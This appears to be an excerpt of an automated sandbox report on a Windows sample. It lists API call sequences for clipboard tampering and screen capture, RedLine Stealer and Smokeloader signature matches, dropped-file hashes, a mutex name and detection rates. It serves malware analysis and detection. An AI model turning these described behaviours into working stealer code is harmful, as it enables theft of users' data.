                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_02481942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02481942
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,1_2_00431839

                System Summary

                barindex
                Source: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_02482361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02482361
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_02482605 NtdllDefWindowProc_W,PostQuitMessage,0_2_02482605
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004280220_2_00428022
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004071AB0_2_004071AB
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004373D90_2_004373D9
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004274840_2_00427484
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004285600_2_00428560
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004166AF0_2_004166AF
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004137250_2_00413725
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004277F60_2_004277F6
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0040E9740_2_0040E974
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0042EAE00_2_0042EAE0
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00427AA00_2_00427AA0
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00418AAF0_2_00418AAF
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00436CBF0_2_00436CBF
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00427D670_2_00427D67
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00413F0B0_2_00413F0B
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A82890_2_024A8289
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024AED470_2_024AED47
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024941720_2_02494172
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A76EB0_2_024A76EB
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024AD7550_2_024AD755
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A87C70_2_024A87C7
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A7A5D0_2_024A7A5D
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0248EBDB0_2_0248EBDB
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024969160_2_02496916
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_0249398C0_2_0249398C
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024B6F260_2_024B6F26
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A7FCE0_2_024A7FCE
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024AED470_2_024AED47
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A7D070_2_024A7D07
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_02498D160_2_02498D16
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0040B44C1_2_0040B44C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004087901_2_00408790
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004260541_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043B0681_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004140701_2_00414070
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043C0201_2_0043C020
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004398301_2_00439830
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043D8301_2_0043D830
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041B0E11_2_0041B0E1
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041F0E01_2_0041F0E0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004210E01_2_004210E0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004358901_2_00435890
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004340981_2_00434098
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043D0A01_2_0043D0A0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004180A91_2_004180A9
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0040A9401_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041714B1_2_0041714B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0040C9171_2_0040C917
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042B12C1_2_0042B12C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042F1301_2_0042F130
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042B1C01_2_0042B1C0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041D9E01_2_0041D9E0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004361E01_2_004361E0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004111E51_2_004111E5
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004059F01_2_004059F0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004239F21_2_004239F2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043C1F01_2_0043C1F0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0040F9FD1_2_0040F9FD
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004259901_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043B9A11_2_0043B9A1
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004062501_2_00406250
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041D2701_2_0041D270
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00424A741_2_00424A74
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004092301_2_00409230
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00423A341_2_00423A34
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004192DA1_2_004192DA
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043D2F01_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043C2801_2_0043C280
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004152981_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004082AE1_2_004082AE
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004252BA1_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041CB051_2_0041CB05
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00428BC01_2_00428BC0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004143C21_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00402BD01_2_00402BD0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00428BE91_2_00428BE9
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004373991_2_00437399
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004393A01_2_004393A0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00416BA51_2_00416BA5
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004293AA1_2_004293AA
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004223B81_2_004223B8
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00436C001_2_00436C00
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004234101_2_00423410
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042B4FC1_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004074B01_2_004074B0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041DD501_2_0041DD50
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004185781_2_00418578
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042D57E1_2_0042D57E
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004245021_2_00424502
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00421D101_2_00421D10
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0040DD251_2_0040DD25
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041D5E01_2_0041D5E0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004175821_2_00417582
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043D5801_2_0043D580
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00427DA21_2_00427DA2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004205B01_2_004205B0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042C64A1_2_0042C64A
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00426E501_2_00426E50
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042B4F71_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0043462A1_2_0043462A
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004356301_2_00435630
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004066E01_2_004066E0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042C6E41_2_0042C6E4
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00430EF01_2_00430EF0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004256F91_2_004256F9
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00422E931_2_00422E93
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00425E901_2_00425E90
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004156A01_2_004156A0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041BEA01_2_0041BEA0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00438EA01_2_00438EA0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00435EA01_2_00435EA0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041C6BB1_2_0041C6BB
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00415F661_2_00415F66
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004197701_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004097001_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042C7261_2_0042C726
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0042C7351_2_0042C735
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_0041DF801_2_0041DF80
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00402FA01_2_00402FA0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009FC0E81_2_009FC0E8
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A180091_2_00A18009
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0C1AC1_2_00A0C1AC
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0E1E71_2_00A0E1E7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A291071_2_00A29107
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A261071_2_00A26107
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A181081_2_00A18108
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A211571_2_00A21157
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A242FF1_2_00A242FF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2B2CF1_2_00A2B2CF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F32071_2_009F3207
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A073B21_2_00A073B2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1B3931_2_00A1B393
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1F3971_2_00A1F397
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F83C71_2_009F83C7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2D3071_2_00A2D307
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A113471_2_00A11347
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0F3471_2_00A0F347
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0B3481_2_00A0B348
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0734A1_2_00A0734A
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F94971_2_009F9497
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F64B71_2_009F64B7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0D4D71_2_00A0D4D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1B4271_2_00A1B427
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A264471_2_00A26447
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0144C1_2_00A0144C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F45D71_2_009F45D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0C5281_2_00A0C528
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A095411_2_00A09541
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2D5571_2_00A2D557
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A296071_2_00A29607
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A196111_2_00A19611
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1D7E51_2_00A1D7E5
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2D7E71_2_00A2D7E7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A087DF1_2_00A087DF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F77171_2_009F7717
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1B7631_2_00A1B763
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1C8B11_2_00A1C8B1
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A248911_2_00A24891
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A258971_2_00A25897
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A108171_2_00A10817
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1B75E1_2_00A1B75E
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0D8471_2_00A0D847
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1C98D1_2_00A1C98D
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1C99C1_2_00A1C99C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F89F71_2_009F89F7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A099D71_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0C9211_2_00A0C921
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F69471_2_009F6947
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A1C94B1_2_00A1C94B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F99671_2_009F9967
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2DA971_2_00A2DA97
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A29A971_2_00A29A97
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A25AF71_2_00A25AF7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A07BA71_2_00A07BA7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009FABA71_2_009FABA7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A15BF71_2_00A15BF7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009FCB7E1_2_009FCB7E
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A13C9B1_2_00A13C9B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A14CF41_2_00A14CF4
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A2BC081_2_00A2BC08
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F3C271_2_009F3C27
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F5C571_2_009F5C57
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0DC471_2_00A0DC47
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009FFC641_2_009FFC64
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009F2E371_2_009F2E37
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A26E671_2_00A26E67
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_009FDF8C1_2_009FDF8C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A0DFB71_2_00A0DFB7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A08F351_2_00A08F35
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_00A11F771_2_00A11F77
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\C455.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: String function: 009F81D7 appears 78 times
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: String function: 00414060 appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: String function: 00407F70 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: String function: 00A042C7 appears 74 times
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: String function: 00410720 appears 52 times
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: String function: 02490987 appears 52 times
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: String function: 0040F903 appears 36 times
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: String function: 0040FDB2 appears 123 times
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: String function: 02490019 appears 119 times
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684
                Source: TN78WX7nJU.exeBinary or memory string: OriginalFileName vs TN78WX7nJU.exe
                Source: TN78WX7nJU.exe, 00000000.00000003.1790276412.00000000024F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TN78WX7nJU.exe
                Source: TN78WX7nJU.exe, 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TN78WX7nJU.exe
                Source: TN78WX7nJU.exe, 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TN78WX7nJU.exe
                Source: TN78WX7nJU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: TN78WX7nJU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C455.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@11/5
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_009BB366 CreateToolhelp32Snapshot,Module32First,0_2_009BB366
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 1_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,1_2_004361E0
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7396
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeFile created: C:\Users\user\AppData\Local\Temp\C455.tmpJump to behavior
                Source: TN78WX7nJU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: TN78WX7nJU.exeVirustotal: Detection: 40%
                Source: TN78WX7nJU.exeReversingLabs: Detection: 44%
